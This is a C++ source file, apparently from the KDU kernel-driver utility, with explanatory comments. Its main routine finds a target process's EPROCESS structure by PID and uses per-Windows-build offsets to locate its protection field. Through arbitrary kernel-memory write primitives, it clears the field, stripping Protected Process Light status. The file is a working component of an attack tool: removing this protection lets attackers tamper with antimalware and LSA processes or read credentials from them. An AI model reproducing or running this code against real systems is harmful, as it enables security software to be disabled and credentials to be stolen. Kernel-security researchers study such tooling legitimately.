/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2020
*
* TITLE: PS.CPP
*
* VERSION: 1.00
*
* DATE: 02 Feb 2020
*
* Process DKOM-related routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* KDUGetProtectionTypeAsString
*
* Purpose:
*
* Map a process protection Type value (one of the PsProtectedType* constants)
* to its symbolic name for display. The returned pointer refers to a string
* literal with static storage: the caller must neither free nor modify it.
* Any value outside the known set yields "Unknown Type".
*
*/
LPSTR KDUGetProtectionTypeAsString(
    _In_ ULONG Type
)
{
    // String literals are const in C++; the casts exist only to satisfy the
    // non-const LPSTR return type and must not be used to write through.
    switch (Type) {
    case PsProtectedTypeNone:
        return (LPSTR)"PsProtectedTypeNone";
    case PsProtectedTypeProtectedLight:
        return (LPSTR)"PsProtectedTypeProtectedLight";
    case PsProtectedTypeProtected:
        return (LPSTR)"PsProtectedTypeProtected";
    default:
        return (LPSTR)"Unknown Type";
    }
}
/*
* KDUGetProtectionSignerAsString
*
* Purpose:
*
* Map a process protection Signer value (one of the PsProtectedSigner*
* constants) to its symbolic name for display. The returned pointer refers
* to a string literal with static storage: the caller must neither free nor
* modify it. Any value outside the known set yields "Unknown Value".
*
*/
LPSTR KDUGetProtectionSignerAsString(
    _In_ ULONG Signer
)
{
    // String literals are const in C++; the casts exist only to satisfy the
    // non-const LPSTR return type and must not be used to write through.
    switch (Signer) {
    case PsProtectedSignerNone:
        return (LPSTR)"PsProtectedSignerNone";
    case PsProtectedSignerAuthenticode:
        return (LPSTR)"PsProtectedSignerAuthenticode";
    case PsProtectedSignerCodeGen:
        return (LPSTR)"PsProtectedSignerCodeGen";
    case PsProtectedSignerAntimalware:
        return (LPSTR)"PsProtectedSignerAntimalware";
    case PsProtectedSignerLsa:
        return (LPSTR)"PsProtectedSignerLsa";
    case PsProtectedSignerWindows:
        return (LPSTR)"PsProtectedSignerWindows";
    case PsProtectedSignerWinTcb:
        return (LPSTR)"PsProtectedSignerWinTcb";
    case PsProtectedSignerWinSystem:
        return (LPSTR)"PsProtectedSignerWinSystem";
    case PsProtectedSignerApp:
        return (LPSTR)"PsProtectedSignerApp";
    default:
        return (LPSTR)"Unknown Value";
    }
}
/*
* KDUControlProcess
*
* Purpose:
*
* Modify process object to remove PsProtectedProcess access restrictions.
*
* Parameters:
*
*   Context   - KDU context. This routine reads Context->NtBuildNumber and
*               passes Context to KDUReadKernelVM / KDUWriteKernelVM; how
*               those primitives reach kernel memory is outside this file.
*   ProcessId - PID of the target process (cast to HANDLE for CLIENT_ID).
*
* Return:
*
*   TRUE only when the kernel write succeeded. FALSE on any earlier failure
*   (process open, EPROCESS lookup, unsupported build, kernel read) or on a
*   failed write. Every outcome is logged to stdout with printf_s.
*
* Notes:
*
*   This is a DKOM read-modify-write of the PS_PROTECTION field inside the
*   target's EPROCESS, located via a build-number -> offset table. The table
*   is the fragile part: a build not listed below falls into the
*   "Unsupported WinNT version" branch and nothing is written. The only
*   handle this routine itself opens on the target carries
*   PROCESS_QUERY_LIMITED_INFORMATION; the modification goes through the
*   Context kernel-memory primitives, not through that handle.
*
*/
BOOL KDUControlProcess(
    _In_ PKDU_CONTEXT Context,
    _In_ ULONG_PTR ProcessId)
{
    BOOL bResult = FALSE;
    // Holds the ULONG read from kernel memory; PsProtection aliases it below.
    ULONG Buffer;
    NTSTATUS ntStatus;
    ULONG_PTR ProcessObject = 0, VirtualAddress = 0, Offset = 0;
    HANDLE hProcess = NULL;

    CLIENT_ID clientId;
    OBJECT_ATTRIBUTES obja;

    PS_PROTECTION* PsProtection;

    printf_s("[>] Entering %s\r\n", __FUNCTION__);

    // Open by CLIENT_ID only: no object name, no inheritance, no security descriptor.
    InitializeObjectAttributes(&obja, NULL, 0, 0, 0);

    clientId.UniqueProcess = (HANDLE)ProcessId;
    clientId.UniqueThread = NULL;

    // Minimal access is sufficient: the handle is used only to resolve the
    // EPROCESS address, never to read or write the process itself.
    ntStatus = NtOpenProcess(&hProcess, PROCESS_QUERY_LIMITED_INFORMATION,
        &obja, &clientId);

    if (NT_SUCCESS(ntStatus)) {

        // %llu assumes a 64-bit ULONG_PTR (x64 build).
        printf_s("[+] Process with PID %llu opened (PROCESS_QUERY_LIMITED_INFORMATION)\r\n", ProcessId);
        // Return value is ignored; the code relies on ProcessObject staying 0
        // (initialized above) when the lookup fails -- confirm against supQueryObjectFromHandle.
        supQueryObjectFromHandle(hProcess, &ProcessObject);

        if (ProcessObject != 0) {

            printf_s("[+] Process object (EPROCESS) found, 0x%llX\r\n", ProcessObject);

            // EPROCESS protection-field offset per NT build; builds
            // 15063 through 18363 share the 15063 layout.
            switch (Context->NtBuildNumber) {
            case 9600:
                Offset = PsProtectionOffset_9600;
                break;
            case 10240:
                Offset = PsProtectionOffset_10240;
                break;
            case 10586:
                Offset = PsProtectionOffset_10586;
                break;
            case 14393:
                Offset = PsProtectionOffset_14393;
                break;
            case 15063:
            case 16299:
            case 17134:
            case 17763:
            case 18362:
            case 18363:
                Offset = PsProtectionOffset_15063;
                break;
            case 19037:
                Offset = PsProtectionOffset_19037;
                break;
            default:
                // Unknown build: leave Offset at 0 so nothing is written below.
                Offset = 0;
                break;
            }

            if (Offset == 0) {
                printf_s("[!] Unsupported WinNT version\r\n");
            }
            else {

                VirtualAddress = EPROCESS_TO_PROTECTION(ProcessObject, Offset);

                printf_s("[+] EPROCESS->PS_PROTECTION, 0x%llX\r\n", VirtualAddress);

                // A full ULONG is read and later written back. If PS_PROTECTION
                // is narrower than a ULONG (confirm in global.h), the remaining
                // bytes are rewritten exactly as read, so a concurrent kernel
                // update to them between the read and the write would be lost.
                Buffer = 0;
                if (KDUReadKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG))) {

                    // Reinterpret the local copy as the kernel structure.
                    PsProtection = (PS_PROTECTION*)&Buffer;

                    LPSTR pStr;

                    printf_s("[+] Kernel memory read succeeded\r\n");

                    // NOTE(review): if Type/Audit/Signer are bit-fields narrower
                    // than ULONG they promote to int before printf_s; %lu matches
                    // in practice on MSVC x64 but is not strictly conforming.
                    pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
                    printf_s("\tPsProtection->Type: %lu (%s)\r\n",
                        PsProtection->Type,
                        pStr);

                    printf_s("\tPsProtection->Audit: %lu\r\n", PsProtection->Audit);

                    pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
                    printf_s("\tPsProtection->Signer: %lu (%s)\r\n",
                        PsProtection->Signer,
                        pStr);

                    // Clear all three protection components in the local copy.
                    PsProtection->Signer = PsProtectedSignerNone;
                    PsProtection->Type = PsProtectedTypeNone;
                    PsProtection->Audit = 0;

                    // Commit the local copy to kernel memory; bResult is the
                    // function's return value and is TRUE only on this path.
                    bResult = KDUWriteKernelVM(Context, VirtualAddress, &Buffer, sizeof(ULONG));
                    if (bResult) {
                        printf_s("[+] Process object modified\r\n");

                        // The "New" values below are taken from the local Buffer,
                        // not from a fresh read of kernel memory.
                        pStr = KDUGetProtectionTypeAsString(PsProtection->Type);
                        printf_s("\tNew PsProtection->Type: %lu (%s)\r\n",
                            PsProtection->Type,
                            pStr);

                        pStr = KDUGetProtectionSignerAsString(PsProtection->Signer);
                        printf_s("\tNew PsProtection->Signer: %lu (%s)\r\n",
                            PsProtection->Signer,
                            pStr);

                        printf_s("\tNew PsProtection->Audit: %lu\r\n", PsProtection->Audit);

                    }
                    else {
                        printf_s("[!] Cannot modify process object\r\n");
                    }
                }
                else {
                    printf_s("[!] Cannot read kernel memory\r\n");
                }
            }
        }
        else {
            printf_s("[!] Cannot query process object\r\n");
        }
        // Reached only on the NtOpenProcess success path, so hProcess is valid.
        NtClose(hProcess);
    }
    else {
        printf_s("[!] Cannot open target process, NTSTATUS (0x%lX)\r\n", ntStatus);
    }

    printf_s("[<] Leaving %s\r\n", __FUNCTION__);

    return bResult;
}